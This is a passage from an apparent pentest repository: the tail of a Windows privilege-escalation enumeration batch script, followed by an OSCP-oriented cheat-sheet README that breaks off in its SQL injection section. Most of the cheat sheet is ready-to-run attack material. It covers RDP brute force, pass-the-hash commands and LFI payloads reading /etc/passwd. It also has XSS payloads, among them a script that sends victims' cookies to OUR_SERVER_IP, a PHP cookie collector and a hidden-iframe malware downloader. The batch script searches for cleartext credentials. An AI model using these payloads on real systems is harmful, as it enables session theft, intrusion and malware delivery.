| SP1 | 'afd.sys' - Local Privilege Escalation | 188 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 189 | 190 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" | find /i "KB2592799" 1>NUL 191 | IF not errorlevel 1 ( 192 | 193 | echo MS11-080 patch is installed :( 194 | 195 | ) ELSE ( 196 | 197 | echo MS11-080 patch is NOT installed! 198 | 199 | ) 200 | 201 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" | find /i "KB3143141" 1>NUL 202 | IF not errorlevel 1 ( 203 | 204 | echo MS16-032 patch is installed :( 205 | 206 | ) ELSE ( 207 | 208 | echo MS16-032 patch is NOT installed! 209 | 210 | ) 211 | 212 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" | find /i "KB2393802" 1>NUL 213 | IF not errorlevel 1 ( 214 | 215 | echo MS11-011 patch is installed :( 216 | 217 | ) ELSE ( 218 | 219 | echo MS11-011 patch is NOT installed! 220 | 221 | ) 222 | 223 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" | find /i "KB982799" 1>NUL 224 | IF not errorlevel 1 ( 225 | 226 | echo MS10-059 patch is installed :( 227 | 228 | ) ELSE ( 229 | 230 | echo MS10-059 patch is NOT installed! 231 | 232 | ) 233 | 234 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" | find /i "KB979683" 1>NUL 235 | IF not errorlevel 1 ( 236 | 237 | echo MS10-021 patch is installed :( 238 | 239 | ) ELSE ( 240 | 241 | echo MS10-021 patch is NOT installed! 242 | 243 | ) 244 | 245 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" | find /i "KB2305420" 1>NUL 246 | IF not errorlevel 1 ( 247 | 248 | echo MS10-092 patch is installed :( 249 | 250 | ) ELSE ( 251 | 252 | echo MS10-092 patch is NOT installed! 
253 | 254 | ) 255 | 256 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" | find /i "KB981957" 1>NUL 257 | IF not errorlevel 1 ( 258 | 259 | echo MS10-073 patch is installed :( 260 | 261 | ) ELSE ( 262 | 263 | echo MS10-073 patch is NOT installed! 264 | 265 | ) 266 | 267 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" | find /i "KB4013081" 1>NUL 268 | IF not errorlevel 1 ( 269 | 270 | echo MS17-017 patch is installed :( 271 | 272 | ) ELSE ( 273 | 274 | echo MS17-017 patch is NOT installed! 275 | 276 | ) 277 | 278 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" | find /i "KB977165" 1>NUL 279 | IF not errorlevel 1 ( 280 | 281 | echo MS10-015 patch is installed :( 282 | 283 | ) ELSE ( 284 | 285 | echo MS10-015 patch is NOT installed! 286 | 287 | ) 288 | 289 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" | find /i "KB941693" 1>NUL 290 | IF not errorlevel 1 ( 291 | 292 | echo MS08-025 patch is installed :( 293 | 294 | ) ELSE ( 295 | 296 | echo MS08-025 patch is NOT installed! 297 | 298 | ) 299 | 300 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" | find /i "KB920958" 1>NUL 301 | IF not errorlevel 1 ( 302 | 303 | echo MS06-049 patch is installed :( 304 | 305 | ) ELSE ( 306 | 307 | echo MS06-049 patch is NOT installed! 308 | 309 | ) 310 | 311 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" | find /i "KB914389" 1>NUL 312 | IF not errorlevel 1 ( 313 | 314 | echo MS06-030 patch is installed :( 315 | 316 | ) ELSE ( 317 | 318 | echo MS06-030 patch is NOT installed! 319 | 320 | ) 321 | 322 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" | find /i "KB908523" 1>NUL 323 | IF not errorlevel 1 ( 324 | 325 | echo MS05-055 patch is installed :( 326 | 327 | ) ELSE ( 328 | 329 | echo MS05-055 patch is NOT installed! 
330 | 331 | ) 332 | 333 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" | find /i "KB890859" 1>NUL 334 | IF not errorlevel 1 ( 335 | 336 | echo MS05-018 patch is installed :( 337 | 338 | ) ELSE ( 339 | 340 | echo MS05-018 patch is NOT installed! 341 | 342 | ) 343 | 344 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" | find /i "KB842526" 1>NUL 345 | IF not errorlevel 1 ( 346 | 347 | echo MS04-019 patch is installed :( 348 | 349 | ) ELSE ( 350 | 351 | echo MS04-019 patch is NOT installed! 352 | 353 | ) 354 | 355 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" | find /i "KB835732" 1>NUL 356 | IF not errorlevel 1 ( 357 | 358 | echo MS04-011 patch is installed :( 359 | 360 | ) ELSE ( 361 | 362 | echo MS04-011 patch is NOT installed! 363 | 364 | ) 365 | 366 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" | find /i "KB841872" 1>NUL 367 | IF not errorlevel 1 ( 368 | 369 | echo MS04-020 patch is installed :( 370 | 371 | ) ELSE ( 372 | 373 | echo MS04-020 patch is NOT installed! 374 | 375 | ) 376 | 377 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" | find /i "KB2975684" 1>NUL 378 | IF not errorlevel 1 ( 379 | 380 | echo MS14-040 patch is installed :( 381 | 382 | ) ELSE ( 383 | 384 | echo MS14-040 patch is NOT installed! 385 | 386 | ) 387 | 388 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" | find /i "KB3136041" 1>NUL 389 | IF not errorlevel 1 ( 390 | 391 | echo MS16-016 patch is installed :( 392 | 393 | ) ELSE ( 394 | 395 | echo MS16-016 patch is NOT installed! 396 | 397 | ) 398 | 399 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" | find /i "KB3057191" 1>NUL 400 | IF not errorlevel 1 ( 401 | 402 | echo MS15-051 patch is installed :( 403 | 404 | ) ELSE ( 405 | 406 | echo MS15-051 patch is NOT installed! 
407 | 408 | ) 409 | 410 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" | find /i "KB2989935" 1>NUL 411 | IF not errorlevel 1 ( 412 | 413 | echo MS14-070 patch is installed :( 414 | 415 | ) ELSE ( 416 | 417 | echo MS14-070 patch is NOT installed! 418 | 419 | ) 420 | 421 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2503665" | find /i "KB2503665" 1>NUL 422 | IF not errorlevel 1 ( 423 | 424 | echo MS11-046 patch is installed :( 425 | 426 | ) ELSE ( 427 | 428 | echo MS11-046 patch is NOT installed! 429 | 430 | ) 431 | 432 | @echo on 433 | 434 | rem #-------------------------# 435 | rem # File Transfer Utilities # 436 | rem #-------------------------# 437 | 438 | @echo off 439 | 440 | cscript /? 441 | powershell.exe /? 442 | tftp /? 443 | 444 | @echo on 445 | 446 | rem #-----------------------------# 447 | rem # Clear-text/base64 Passwords # 448 | rem #-----------------------------# 449 | 450 | @echo off 451 | 452 | type c:\sysprep.inf 453 | type c:\sysprep\sysprep.xml 454 | type %WINDIR%\Panther\Unattend\Unattended.xml 455 | type %WINDIR%\Panther\Unattended.xml 456 | dir /s *pass* 457 | dir /s *cred* 458 | dir /s *vnc* 459 | dir /s *.config 460 | 461 | @echo on 462 | 463 | rem #--------------# 464 | rem # Backup Files # 465 | rem #--------------# 466 | 467 | @echo off 468 | 469 | dir /s *backup* 470 | 471 | @echo on 472 | 473 | rem #----------------------------------# 474 | rem # *.MSI Install - SYSTEM privilege # 475 | rem #----------------------------------# 476 | 477 | @echo off 478 | 479 | rem This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1. 480 | rem This setting will allow low privilege user to install any .MSI as system! 
481 | 482 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 483 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 484 | 485 | @echo on 486 | 487 | rem #------------------------# 488 | rem # Unquoted Service Paths # 489 | rem #------------------------# 490 | 491 | @echo off 492 | 493 | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 494 | 495 | rem All commands from this point onward will require accesschk.exe 496 | rem Make sure you have accesschk.exe(old version) in same directory when you run the script! 497 | 498 | @echo on 499 | 500 | rem #---------------------# 501 | rem # Vulnerable Services # 502 | rem #---------------------# 503 | 504 | @echo off 505 | 506 | rem By default WinXP SP1 grant "Authenticated Users" SERVICE_ALL_ACCESS to "SSDPSRV" and "upnphost"! 507 | 508 | accesschk.exe /accepteula -uwcqv "Authenticated Users" * 509 | accesschk.exe /accepteula -uwcqv "Power Users" * 510 | accesschk.exe /accepteula -uwcqv "Users" * 511 | 512 | @echo on 513 | 514 | rem #-------------------------------# 515 | rem # Vulnerable Folder Permissions # 516 | rem #-------------------------------# 517 | 518 | @echo off 519 | 520 | accesschk.exe /accepteula -uwdqs "Users" c:\ 521 | accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ 522 | 523 | @echo on 524 | 525 | rem #-----------------------------# 526 | rem # Vulnerable File Permissions # 527 | rem #-----------------------------# 528 | 529 | @echo off 530 | 531 | accesschk.exe /accepteula -uwqs "Users" c:\*.* 532 | accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* 533 | 534 | @echo on 535 | 536 | rem #----------------# 537 | rem # Happy Hunting! 
# 538 | rem #----------------# 539 | 540 | @echo off 541 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | <p align="center"> 2 | <img src="https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/blob/master/CheatSheets/28533648.png" alt="Pentest Cheat Sheets" width="300" /> 3 | </p> 4 | 5 | # Pentest-Cheat-Sheets 6 | This repo is a collection of code snippets and commands to make our lives easier. 7 | It is not meant to be a crutch; it is a way to avoid wasting precious time. 8 | It also helps anyone working toward the OSCP: you'll find many ways to do things without the Metasploit Framework. 9 | 10 | ## Ninja Tricks 11 | 12 | - [Recon](#recon) 13 | - [DNS](#dns) 14 | - [SPF](#spf-recon) 15 | - [Nmap](#nmap) 16 | - [NetCat](#netcat) 17 | - [SNMP](#snmp) 18 | - [Mysql](#mysql) 19 | - [MS SQL](#mssql) 20 | - [Web Enumeration](#web-enumeration) 21 | - [Exploitation](#exploitation) 22 | - [System Network](#system-network) 23 | - [RDP](#rdp) 24 | - [Pass The Hash](#pass-the-hash) 25 | - [Windows-Shell](#windows-shell) 26 | - [Web Application](#web-application) 27 | - [Web Remote Code Execution](#web-remote-code-execution) 28 | - [LFI](#lfi) 29 | - [encode](#encode) 30 | - [XSS](#xss) 31 | - [SQLi](#sqli) 32 | - [sqlmap](#sqlmap) 33 | - [Bare Hands](#bare-hands) 34 | - [Jenkins](#jenkins) 35 | - [Post-exploitation](#post-exploitation) 36 | - [Reverse Shell](#reverse-shell) 37 | - [PHP Reverse Shell](#php-reverse-shell) 38 | - [Perl Reverse Shell](#perl-reverse-shell) 39 | - [Python Reverse Shell](#python-reverse-shell) 40 | - [Ruby Reverse Shell](#ruby-reverse-shell) 41 | - [Bash Reverse Shell](#bash-reverse-shell) 42 | - [PowerShell Reverse Shell](#powershell-reverse-shell) 43 | - [Java Reverse Shell](#java-reverse-shell) 44 | - [Xterm Reverse Shell](#xterm-reverse-shell) 45 | - [Linux](#linux) 46 | - [Linux Privilege 
Escalation](#linux-privilege-escalation) 47 | - [Data Harvesting and Enumeration](#data-harvesting-enumeration) 48 | - [Linux Pivot](#linux-pivot) 49 | - [Sshuttle](#sshuttle) 50 | - [VPNPivot](#vpn-pivot) 51 | - [SSH Tunneling](#ssh-tunneling) 52 | - [Linux Backdooring](#linux-backdooring) 53 | - [Windows](#windows) 54 | - [Windows Enumeration](#windows-enumeration) 55 | - [Windows Privilege Escalation](#windows-privilege-escalation) 56 | - [Hashdump](#hashdump) 57 | - [Transferring Files Without Metasploit](#transferring-files-without-metasploit) 58 | - [Backdooring](#windows-backdooring) 59 | - [Windows Pivot](#windows-pivot) 60 | - [Openssh for Tunneling](#openssh-for-tunneling) 61 | - [Plink](#plink) 62 | - [Resources](#resources) 63 | - [HTTP/HTTPS Servers](#http-server) 64 | - [Wordlist](#wordlist) 65 | - [seclist](#seclist) 66 | - [cotse](#cotse) 67 | - [PacketStorm](#packetstorm) 68 | - [Default Passwords](#default-passwords) 69 | - [Default Password](#default-password) 70 | - [Router Password](#router-password) 71 | - [Leak](#leak) 72 | - [Pastebin](#pastebin) 73 | - [Tables](#tables) 74 | - [Contribution](#contribution) 75 | 76 | # Recon 77 | 78 | ## DNS 79 | 80 | ### Nslookup 81 | 82 | Resolve a given hostname to the corresponding IP. 
83 | 84 | ```shell 85 | nslookup targetorganization.com 86 | ``` 87 | 88 | ### Reverse DNS lookup 89 | 90 | ```shell 91 | nslookup -type=PTR IP_address 92 | ``` 93 | 94 | ### MX (Mail Exchange) lookup 95 | 96 | ```shell 97 | nslookup -type=MX domain 98 | ``` 99 | 100 | ### Zone Transfer 101 | 102 | #### Using nslookup Command 103 | (`ls -d` requests a full zone transfer; the `ls` subcommand only exists in the Windows nslookup, on Linux use the `host -l` form below) 104 | ```shell 105 | nslookup 106 | server domain.com 107 | ls -d domain.com 108 | ``` 109 | #### Using HOST Command 110 | 111 | host -t ns (Name Server) < domain > 112 | 113 | ```shell 114 | host -t ns domain.com 115 | ``` 116 | 117 | then test each nameserver for a zone transfer 118 | 119 | host -l < domain > < nameserver > 120 | 121 | ```shell 122 | host -l domain.com ns2.domain.com 123 | ``` 124 | 125 | ### Nmap DNS Enumeration 126 | 127 | ``` 128 | nmap -F --dns-servers <dns server ip> <target ip range> 129 | ``` 130 | 131 | ### Auto tools 132 | 133 | #### DNSenum 134 | 135 | ``` 136 | dnsenum targetdomain.com 137 | ``` 138 | 139 | ``` 140 | dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com 141 | ``` 142 | 143 | #### DNSmap 144 | 145 | ```bash 146 | dnsmap targetdomain.com 147 | ``` 148 | 149 | ```bash 150 | dnsmap targetdomain.com -w <wordlist file.txt> 151 | ``` 152 | 153 | Brute force and save the results to a file in /tmp (with a directory, dnsmap generates the file name) 154 | 155 | ```bash 156 | dnsmap targetdomain.com -r /tmp/ 157 | ``` 158 | 159 | #### DNSRecon DNS Brute Force 160 | 161 | ```bash 162 | dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t brt --xml output.xml 163 | ``` 164 | 165 | #### Fierce.pl 166 | 167 | ``` 168 | fierce -dns targetdomain.com 169 | ``` 170 | 171 | #### HostMap 172 | 173 | ``` 174 | hostmap.rb -only-passive -t <IP> 175 | ``` 176 | 177 | We can also use -with-zonetransfer or -bruteforce-level 178 | 179 | ## 180 |  181 | ## SPF Recon 182 | 183 | ### Dig SPF txt 184 | 185 | ```bash 186 | dig txt target.com 187 | ``` 188 | #### Dmarc 189 | 190 | ```bash 191 | dig TXT _dmarc.example.org 192 | ``` 193 | 194 | #### Online Tools 195 | 196 | * https://dnsdumpster.com/ 197 | * 
https://network-tools.com/nslook/ 198 | * https://www.dnsqueries.com/en/ 199 | * https://mxtoolbox.com/ 200 | 201 | ## 202 | 203 | ## Nmap 204 | 205 | Set the IP address and the network as variables 206 | 207 | `export ip=192.168.1.100` 208 | `export netw=192.168.1.0/24` 209 | 210 | ### Detecting Live Hosts 211 | 212 | IPs only (`grep for` keeps the "Nmap scan report for <ip>" lines, `cut` keeps the address) 213 | 214 | ```shell 215 | nmap -sn -n $netw | grep for | cut -d" " -f5 216 | ``` 217 | 218 | ### Stealth Scan 219 | 220 | ```shell 221 | nmap -sS $ip 222 | ``` 223 | (SYN scan needs raw sockets, so run it as root) 224 | Only Open Ports and Banner Grab 225 | 226 | ```shell 227 | nmap -n -Pn -sS $ip --open -sV 228 | ``` 229 | 230 | Stealth scan using FIN Scan 231 | 232 | ```shell 233 | nmap -sF $ip 234 | ``` 235 | 236 | ### Aggressive scan 237 | 238 | No ping, no DNS resolution, show only open ports and test all 65535 TCP ports 239 | 240 | ```shell 241 | nmap -n -Pn -sS -A $ip --open -p- 242 | ``` 243 | 244 | Nmap verbose scan: SYN stealth scan, T4 timing, OS and service version detection, traceroute and default scripts against the services found 245 | 246 | ```shell 247 | nmap -v -sS -A -T4 $ip 248 | ``` 249 | 250 | ### OS Fingerprint 251 | 252 | ```shell 253 | nmap -O $ip 254 | ``` 255 | 256 | ### Quick Scan 257 | 258 | ```shell 259 | nmap -T4 -F $netw 260 | ``` 261 | 262 | ### Quick Scan Plus 263 | 264 | ```shell 265 | nmap -sV -T4 -O -F --version-light $netw 266 | ``` 267 | 268 | ### Output to a file (-oN, normal format) 269 | 270 | ```shell 271 | nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip 272 | ``` 273 | 274 | ### Output to a file Plus (-oA writes normal, grepable and XML output at once) 275 | 276 | ```shell 277 | nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw 278 | ``` 279 | 280 | ### Search NMAP scripts 281 | 282 | ```shell 283 | ls /usr/share/nmap/scripts/ | grep ftp 284 | ``` 285 | 286 | * [Nmap Discovery](https://nmap.org/nsedoc/categories/discovery.html) 287 | 288 | 289 | ## 290 | 291 | ## NetCat 292 | 293 | ### Port Scanner 294 | 295 | One port 296 | 297 | ```shell 298 | nc -nvz 192.168.1.23 80 299 | ``` 300 | 301 | Port Range 302 | 303 | ```shell 304 | nc -vnz 192.168.1.23 
0-1000 305 | ``` 306 | 307 | ### Send files 308 | 309 | * Server 310 | 311 | ```shell 312 | nc -lvp 1234 > file_name_to_save 313 | ``` 314 | 315 | * Client 316 | 317 | ```shell 318 | nc -vn 192.168.1.33 1234 < file_to_send 319 | ``` 320 | 321 | ### Executing remote script 322 | 323 | * Server (`-e` runs a single executable with no arguments and exists only in netcat-traditional and ncat, so put the target IP inside the script) 324 | 325 | ```shell 326 | nc -lvp 1234 -e ./ping.sh 327 | ``` 328 | 329 | * Client 330 | 331 | ```shell 332 | nc -vn 192.168.1.33 1234 333 | ``` 334 | 335 | ### Chat with encryption 336 | 337 | * Server 338 | 339 | ```shell 340 | ncat -nlvp 8000 --ssl 341 | ``` 342 | 343 | * Client (must also use `--ssl`, otherwise the TLS handshake fails) 344 | 345 | ```shell 346 | ncat -nv 192.168.1.33 8000 --ssl 347 | ``` 348 | 349 | ### Banner Grabbing 350 | 351 | * Request 352 | 353 | ```shell 354 | nc target port 355 | HTTP_Verb path http/version 356 | Host: url 357 | ``` 358 | 359 | * Example 360 | 361 | ```shell 362 | nc www.bla.com.br 80 363 | HEAD / HTTP/1.0 364 | Host: www.bla.com.br 365 | ``` 366 | 367 | ### If the site uses HTTPS you need to use openssl 368 | 369 | ```shell 370 | openssl s_client -quiet www.bla.com.br:443 371 | ``` 372 | 373 | ## 374 | 375 | ## SNMP 376 | 377 | ### Fixing SNMP output 378 | Install the MIBs, then blank snmp.conf: the Debian default contains a `mibs :` line that stops OIDs from being translated to names 379 | ```shell 380 | apt-get install snmp-mibs-downloader 381 | download-mibs 382 | ``` 383 | ```shell 384 | echo "" > /etc/snmp/snmp.conf 385 | ``` 386 | 387 | ### OneSixtyone 388 | 389 | onesixtyone -c COMMUNITY_FILE -i Target_ip 390 | 391 | ```shell 392 | onesixtyone -c community.txt -i Found_ips.txt 393 | ``` 394 | 395 | ### snmpwalk 396 | 397 | Walking MIBs 398 | 399 | snmpwalk -c COMMUNITY -v VERSION target_ip 400 | 401 | ```shell 402 | snmpwalk -c public -v1 192.168.25.77 403 | ``` 404 | 405 | Specific MIB node 406 | snmpwalk -c community -v version Target_IP MIB_Node 407 | Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25 408 | 409 | ```shell 410 | snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25 411 | ``` 412 | 413 | ### snmp-check 414 | 415 | snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY 416 | 417 | 
```shell 418 | snmp-check -t 172.20.10.5 419 | ``` 420 | 421 | ```shell 422 | snmp-check -t 172.20.10.5 -c public 423 | ``` 424 | 425 | ### Automate the username enumeration process for SNMPv3 426 | 427 | ```shell 428 | apt-get install snmp snmp-mibs-downloader 429 | ``` 430 | 431 | ```shell 432 | wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb 433 | ``` 434 | 435 | ### NMAP SNMPv3 Enumeration 436 | SNMP runs over UDP, so the port has to be scanned with -sU 437 | ```shell 438 | nmap -sU -sV -p 161 --script=snmp-info 172.20.10.0/24 439 | ``` 440 | 441 | ### Default Credentials 442 | 443 | ```shell 444 | /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 445 | ``` 446 | 447 | ## 448 | 449 | ## MYSQL 450 | 451 | ### Try remote default Root access 452 | 453 | MySQL exposed to the network; `-p` prompts for the password, so try an empty one first 454 | 455 | ```shell 456 | mysql -h Target_ip -u root -p 457 | ``` 458 | 459 | ## MSSQL 460 | 461 | ### MSSQL Information Gathering 462 | 463 | ``` 464 | nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip 465 | ``` 466 | 467 | ## Web Enumeration 468 | 469 | ### Dirsearch 470 | 471 | ```shell 472 | dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old 473 | ``` 474 | 475 | ```shell 476 | dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist 477 | ``` 478 | 479 | ```shell 480 | dirsearch -u https://target.com -e . 
481 | ``` 482 | ### dirb 483 | 484 | ```shell 485 | dirb http://target.com /path/to/wordlist 486 | ``` 487 | 488 | ```shell 489 | dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old 490 | ``` 491 | 492 | ### Gobuster 493 | 494 | ```shell 495 | gobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txt 496 | ``` 497 | 498 | ## 499 | 500 | # Exploitation 501 | 502 | ## System Network 503 | 504 | ## RDP 505 | 506 | ### xfreerdp 507 | 508 | ##### Simple User Enumeration for Windows Target (kerberos based) 509 | 510 | xfreerdp /v:<target_ip> -sec-nla /u:"" 511 | 512 | ``` 513 | xfreerdp /v:192.168.0.32 -sec-nla /u:"" 514 | ``` 515 | 516 | ### login 517 | 518 | xfreerdp /u:<user> /g:<domain> /p:<pass> /v:<target_ip> 519 | 520 | ``` 521 | xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34 522 | ``` 523 | 524 | #### Wordlist based bruteforce 525 | 526 | ### NCRACK 527 | 528 | ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389 529 | 530 | ``` 531 | ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389 532 | ``` 533 | 534 | ### Crowbar 535 | 536 | crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v 537 | 538 | ``` 539 | crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v 540 | ``` 541 | 542 | ## Pass the hash 543 | 544 | ### Smb pass the hash 545 | 546 | #### Tool: 547 | 548 | [pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) 549 | 550 | 551 | ### Listing shared folders 552 | 553 | sudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 -L <target_ip> \\\\<target_ip>\\ <hash> 554 | 555 | ``` 556 | sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 \\\\192.168.0.24\\ ljahdçjkhadkahdkjahsdlkjahsdlkhadklad 557 | ``` 558 | 559 | ### Interactive smb shell 560 | 561 | sudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 \\\\<target_ip>\\shared_folder <hash> 562 | 563 | ``` 564 | 
sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\192.168.0.24\\folder ljahdçjkhadkahdkjahsdlkjahsdlkhadklad 565 | ``` 566 | 567 | ## Web Application 568 | 569 | ### Web Remote code 570 | 571 | 572 | ### LFI (Local File Inclusion) 573 | 574 | Situation 575 | 576 | ``` 577 | http://<target>/index.php?parameter=value 578 | ``` 579 | 580 | #### How to Test 581 | The php://filter wrapper returns the source of index.php base64-encoded instead of executing it; decode the response with `base64 -d` 582 | ``` 583 | http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index 584 | ``` 585 | 586 | ``` 587 | http://<target>/script.php?page=../../../../../../../../etc/passwd 588 | 589 | ``` 590 | Windows target: 591 | ``` 592 | http://<target>/script.php?page=../../../../../../../../boot.ini 593 | ``` 594 | 595 | #### LFI Payloads 596 | 597 | * [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders) 598 | * [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) 599 | 600 | ### encode 601 | 602 | 603 | 604 | ## XSS 605 | 606 | ### Reflected 607 | 608 | #### Simple test 609 | A quick probe: if the rest of the page renders as raw text, the input is not being encoded. This is not proof that the field is vulnerable to XSS 610 | 611 | ```html 612 | <plaintext> 613 | ``` 614 | 615 | #### Simple XSS test 616 | 617 | ```html 618 | <script>alert('Found')</script> 619 | ``` 620 | Breaking out of an attribute value first: 621 | ```html 622 | "><script>alert('Found')</script>"> 623 | ``` 624 | 625 | ```html 626 | <script>alert(String.fromCharCode(88,83,83))</script> 627 | ``` 628 | 629 | #### Bypass filter of tag script 630 | Use an event handler attribute instead of a script tag: 631 | `" onload="alert(String.fromCharCode(88,83,83))` 632 | 633 | ```html 634 | " onload="alert('XSS') 635 | ``` 636 | 637 | bla is not a valid image, so loading it fails and the onerror handler fires 638 | 639 | ```html 640 | <img src='bla' onerror=alert("XSS")> 641 | ``` 642 | 643 | ### Persistent 644 | 645 | ```html 646 | "><script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>";</script> 647 | ``` 648 | 649 | 
### PHP collector 650 | 651 | `> cookie.txt` 652 | `chmod 666 cookie.txt` (the web server user only needs write access) 653 | 654 | Edit a PHP page like colector.php as follows: 655 | 656 | ```php 657 | <?php 658 | $cookie=$_GET['cookie']; 659 | $useragent=$_SERVER['HTTP_USER_AGENT']; 660 | $file=fopen('cookie.txt', 'a'); 661 | fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n"); 662 | fclose($file); 663 | ?> 664 | ``` 665 | 666 | Script to put in the page (encodeURIComponent stops the `;` and `=` in the cookie string from breaking the query string): 667 | 668 | ```html 669 | <script>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+encodeURIComponent(document.cookie);</script> 670 | ``` 671 | 672 | #### Malware Downloader via XSS 673 | 674 | ```html 675 | <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> 676 | ``` 677 | 678 | #### How to play Mario with XSS 679 | 680 | ```html 681 | <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> 682 | ``` 683 | 684 | ```html 685 | <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus> 686 | ``` 687 | 688 | #### XSS payloads 689 | 690 | * [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection) 691 | * [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS) 692 | 693 | 694 | ## SQLI 695 | 696 | SQL Injection 697 | 698 | ### Sqlmap 699 | 700 | #### GET 701 | 702 | #### Error-Based 703 | 704 | #### Simple test 705 | 706 | Add a single quote `'` to the parameter and look for a database error in the response 707 | 708 | Example: 709 | ``` 710 | http://192.168.1.104/Less-1/?id=5' 711 | ``` 712 | 713 | #### List databases 714 | 715 | 716 | ```bash 717 | ./sqlmap.py -u http://localhost/Less-1/?id=1 --dbs 718 | ``` 719 | #### List tables 720 | 721 | 722 | ```bash 723 | ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name --tables 724 | ``` 725 | 726 | #### List columns 727 | 728 | ```bash 729 | ./sqlmap.py -u http://localhost/Less-1/?id=1 -D 
